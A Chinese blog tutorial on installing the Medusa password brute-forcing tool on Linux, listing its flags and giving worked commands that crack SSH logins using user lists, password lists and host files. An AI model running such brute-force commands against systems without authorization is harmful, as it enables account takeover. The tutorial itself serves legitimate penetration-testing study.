linux下安装暴力破解软件medusa和详细使用教程
文章导航
一、Medusa简介
二、安装
三、使用教程
1、使用参数
一. Medusa 简介
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测试。Medusa 和 hydra 一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra 要好很多,但其支持模块要比 hydra 少一些。 Medusa 是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP, PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具,官方网站:http://foofus.net/goons/jmk/medusa/medusa.html
二.安装
以下是在Linux下安装Medusa的详细步骤:
1.打开终端并使用以下命令更新系统软件包列表:
sudo apt-get update
2.然后使用以下命令安装Medusa:
sudo apt-get install medusa
3.安装完成后,您可以通过以下命令检查Medusa是否已正确安装:
medusa -h如果成功安装,则会显示Medusa的帮助文档。
4.现在您可以开始使用Medusa破解密码了。例如,要使用SSH协议破解远程服务器的密码,请使用以下命令:
medusa -u <用户名> -P <密码字典文件路径> -h <目标主机IP> -M ssh其中,“-u”参数指定要破解的用户名,“-P”参数指定密码字典文件路径,“-h”参数指定目标主机IP,“-M”参数指定使用的协议类型。
三、使用教程
1.使用参数
-h [TEXT] #目标IP
-H [FILE] #目标主机文件
-u [TEXT] #用户名
-U [FILE] #用户名文件
-p [TEXT] #密码;
-P [FILE] #密码文件
-C [FILE] #组合条目文件
-O [FILE] #文件日志信息
-e [n/s/ns] #N意为空密码,S意为密码与用户名相同;指定要排除的密码,可以使用正则表达式。
-M [TEXT] #模块执行名称
-m [TEXT] #传递参数到模块
-d #显示所有的模块名称
-n [NUM] #使用非默认端口
-s #启用SSL
-r [NUM] #重试间隔时间,默认为3秒
-t [NUM] #设定线程数量
-L #并行化,每个用户使用一个线程
-f #在任何主机上找到第一个账号/密码后,停止破解
-q #显示模块的使用信息
-v [NUM] #详细级别(0-6)
-w [NUM] #错误调试级别(0-10)
-V #显示版本
-Z [TEXT] #继续扫描上一次2.基本用法
使用Medusa的基本语法格式为:
medusa [options] -h <目标主机> -u <用户名> -P <密码字典文件>其中,“-h”参数指定要破解的目标主机IP或域名,“-u”参数指定要破解的用户名,“-P”参数指定密码字典文件路径
3.支持的协议和服务
Medusa支持多种协议和服务,包括SSH、FTP、Telnet、HTTP、SMB等。您可以使用“-M”参数指定要使用的协议类型,例如:
medusa -M ssh -h <目标主机> -u <用户名> -P <密码字典文件>实列演示:
medusa -M ssh -h 192.168.1.10 -u testuser -P pwdlist.txt -v #其中,“-v”参数会输出详细信息,包括每个尝试登录的结果。如果成功找到匹配的密码,则会显示“SUCCESS”消息和密码文本。4.指定用户名于密码于服务进行破解
medusa -M ssh -u root -p owaspbwa -h 192.168.72.142
5.指定文件进行破解
创建密码文件,并进行指定
medusa -M ssh -u root -P pwdlist.txt -h 192.168.178.136
6.指定用户列表文件
medusa -M ssh -U userlist.txt -P pwdlist.txt -h 192.168.178.136
7.同时我们也可以将见用户改为文件,同时我们也将线程数调为5
medusa -M ssh -U userlist.txt -P pwdlist.txt -H server.txt -t 5
